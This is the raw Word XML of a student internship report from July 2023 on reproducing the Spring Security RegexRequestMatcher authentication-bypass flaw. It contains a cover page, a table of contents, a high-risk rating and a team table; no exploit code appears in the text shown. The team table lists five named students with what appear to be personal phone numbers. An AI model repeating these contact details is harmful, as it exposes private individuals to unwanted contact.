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ajorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p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t>实习实训</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p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br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="14746356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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p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cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28487 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36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漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>结论（</w:t>
          </w:r>
          <w:r>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28487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theme="majorEastAsia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_Toc7481 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>风险等级分布</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7481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_Toc24528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工作</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>计划（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24528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_Toc13939 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>工作</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>人员</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13939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_Toc3137 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞</w:t>
          </w:r>
          <w:r>
            <w:rPr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_Toc3137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_Toc7909 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>阶段</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7909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2.4风险等级</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1860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_Toc6133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漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>过程（</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6133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_Toc18532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3.1 风险管理及规避</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18532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_Toc4033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</w:t>
          </w:r>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4033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_Toc28445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</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试中所用的工具</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28445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_Toc12892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>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>结果（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12892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_Toc32666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4.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32666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_Toc25120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4.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25120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bidi w:val="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/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spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="1" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>南开大学360实习实训第11组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对Spring Security RegexRequestMatcher 认证绕过漏洞进行了全面深入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/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本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个,低危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个。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4714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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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3" w:name="_Hlk482954515"/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714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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风险值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595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="13"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Spring Security RegexRequestMatcher </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156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szCs w:val="24"/>
              </w:rPr>
              <w:t>认证绕过漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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高危（8.2）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/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156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc7481"/>
      <w:bookmarkStart w:id="5" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="6" w:name="_Toc5011"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5219700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13194" r="21627" b="557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312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc13939"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="81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722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="45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序号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职务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姓名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组长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王伯雅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15503567789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李佳豪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13191110713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刘哲泽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16650717520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钟雨哲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17879630977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吴帅达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13375663376</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring Security RegexRequestMatcher 认证绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="18" w:name="_Toc5023"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never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343" w:type="dxa"/>
            <w:vAlign w:val="center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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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43" w:type="dxa"/>
            <w:vAlign w:val="center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环境搭建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
